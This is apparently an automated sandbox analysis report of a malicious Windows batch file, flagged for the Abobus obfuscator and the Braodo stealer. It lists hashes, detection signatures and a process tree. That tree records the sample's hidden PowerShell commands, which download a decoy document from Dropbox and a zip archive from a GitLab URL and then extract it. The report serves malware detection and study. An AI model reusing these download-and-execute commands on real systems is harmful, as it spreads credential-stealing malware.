Edit tour
Windows
Analysis Report
hnskdfgjgar22.bat
Overview
General Information
| Sample name: | hnskdfgjgar22.bat |
| Analysis ID: | 1580250 |
| MD5: | ed0e925d4c24330ba19fadc0fa66c439 |
| SHA1: | cf2e90032cb7f47df5c7a2104260b167cb61288a |
| SHA256: | d612e6d64d2b598b2c0db5434d946f0f02237eb0bf80eaa8801c59f2519769c8 |
| Tags: | batuser-RavenR00tkit |
| Infos: |   |
 | |
Detection
Abobus Obfuscator, Braodo
| Score: | 92 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 7480 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\hnskd fgjgar22.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7488 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
chcp.com (PID: 7532 cmdline: chcp.com 4 37 MD5: 33395C4732A49065EA72590B14B64F32) - findstr.exe (PID: 7548 cmdline:
findstr /L /I set "C :\Users\us er\Desktop \hnskdfgjg ar22.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7564 cmdline:
findstr /L /I goto " C:\Users\u ser\Deskto p\hnskdfgj gar22.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7580 cmdline:
findstr /L /I echo " C:\Users\u ser\Deskto p\hnskdfgj gar22.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7596 cmdline:
findstr /L /I pause "C:\Users\ user\Deskt op\hnskdfg jgar22.bat " MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - find.exe (PID: 7612 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - cmd.exe (PID: 7628 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 7644 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - cmd.exe (PID: 7660 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
powershell.exe (PID: 7676 cmdline: powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //www.drop box.com/sc l/fi/vhrhi h3o3p0hmel iarlms/Gar min_Campai gn_Informa tion_for_P artners_V1 5.docx?rlk ey=iaci7bn jojiy1pqkw sdtq4d9m&s t=bgm6bs4o &dl=1', 'C :\Users\us er\AppData \Local\Tem p\\Garmin_ Campaign_I nformation _for_Partn ers_V15.do cx')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7844 cmdline:
powershell -WindowSt yle Hidden -Command "Start-Pro cess 'C:\U sers\user\ AppData\Lo cal\Temp\\ Garmin_Cam paign_Info rmation_fo r_Partners _V15.docx' " MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7928 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //gitlab.c om/awsr/ga /-/raw/mai n/FGA2112. zip', 'C:\ Users\Publ ic\Documen t.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7728 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "Add-T ype -Assem blyName Sy stem.IO.Co mpression. FileSystem ; [System. IO.Compres sion.ZipFi le]::Extra ctToDirect ory('C:/Us ers/Public /Document. zip', 'C:/ Users/Publ ic/Documen t')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Integrated Neural Analysis Model: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | JA3 fingerprint: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||